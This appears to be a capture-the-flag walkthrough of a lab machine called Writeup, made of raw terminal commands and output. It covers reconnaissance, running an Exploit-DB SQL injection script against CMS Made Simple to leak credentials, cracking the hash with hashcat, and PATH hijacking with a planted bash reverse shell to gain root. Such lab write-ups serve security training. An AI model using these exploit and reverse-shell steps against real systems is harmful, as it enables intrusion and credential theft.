$ nmap -p- -T4 -A 10.10.10.138
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open tcpwrapped
$ dirb http://10.10.10.138
$ nikto -h http://10.10.10.138
OWASP ZAP
http://10.10.10.138/writeup/
http://10.10.10.138/writeup/index.php?page=writeup
http://10.10.10.138/writeup/index.php?page=ypuffy
http://10.10.10.138/writeup/index.php?page=blue
http://10.10.10.138/robots.txt
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
view-source:http://10.10.10.138/writeup/index.php?page=writeup
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
jkr@writeup.htb
$ sudo npm i -g wappalyzer
$ wappalyzer http://10.10.10.138/writeup/ | jq
CMS Made Simple
CMS Made Simple < 2.2.10 - SQL Injection
https://www.exploit-db.com/exploits/46635
wget https://www.exploit-db.com/download/46635
python3 46635.py -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
$ hash-identifier 62def4866937f08cc13bab43bb14e6f7
$ hashid 62def4866937f08cc13bab43bb14e6f7
$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
$ ssh jkr@10.10.10.138
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978
PATH HIJACKING
jkr@writeup:/etc/update-motd.d$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 19 2019 .
drwxr-xr-x 81 root root 4096 Aug 23 2019 ..
-rwxr-xr-x 1 root root 23 Jun 3 2018 10-uname
jkr@writeup:/etc/update-motd.d$ cat 10-uname
#!/bin/sh
uname -rnsom
jkr@writeup:/etc/update-motd.d$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
kali@kali:~/0.htb/machines/Writeup138$ scp pspy32 jkr@10.10.10.138:/tmp
jkr@writeup:/tmp$ chmod +x pspy32
jkr@writeup:/tmp$ ./pspy32
2021/07/21 10:08:12 CMD: UID=0 PID=5732 | sshd: jkr [priv]
2021/07/21 10:08:12 CMD: UID=0 PID=5733 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2021/07/21 10:08:13 CMD: UID=0 PID=5734 | run-parts --lsbsysinit /etc/update-motd.d
2021/07/21 10:08:13 CMD: UID=0 PID=5735 | /bin/sh /
2021/07/21 10:08:13 CMD: UID=0 PID=5735 | /bin/sh /etc/update-motd.d/10-uname
jkr@writeup:~$ groups
jkr cdrom floppy audio dip video plugdev staff netdev
jkr@writeup:~$ find / -group staff 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
jkr@writeup:~$
jkr@writeup:/usr/local$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
jkr@writeup:/usr/local$ cd /tmp
jkr@writeup:/tmp$ printf '#!/bin/bash' > uname
jkr@writeup:/tmp$ printf '\nbash -i >& /dev/tcp/10.10.14.136/4444 0>&1' >> uname
jkr@writeup:/tmp$ chmod a+x uname
jkr@writeup:/tmp$ cat uname
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.136/4444 0>&1
jkr@writeup:/tmp$ cp uname /usr/local/bin
jkr@writeup:/tmp$
kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
kali@kali:~/0.htb/machines/Writeup138$ ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.10.138] 37290
bash: cannot set terminal process group (5762): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# id;pwd
id;pwd
uid=0(root) gid=0(root) groups=0(root)
/
root@writeup:/# cd /root
cd /root
root@writeup:/root# ls -la
ls -la
total 28
drwx------ 4 root root 4096 Aug 23 2019 .
drwxr-xr-x 22 root root 4096 Apr 19 2019 ..
lrwxrwxrwx 1 root root 9 Apr 19 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jun 3 2018 .bashrc
drwxr-xr-x 2 root root 4096 May 1 2019 .nano
-rw-r--r-- 1 root root 148 Jun 3 2018 .profile
drwx------ 2 root root 4096 May 1 2019 bin
-r-------- 1 root root 33 Apr 19 2019 root.txt
root@writeup:/root# cat root.txt
cat root.txt
eeba47f60b48ef92b734f9b6198d7226
root@writeup:/root#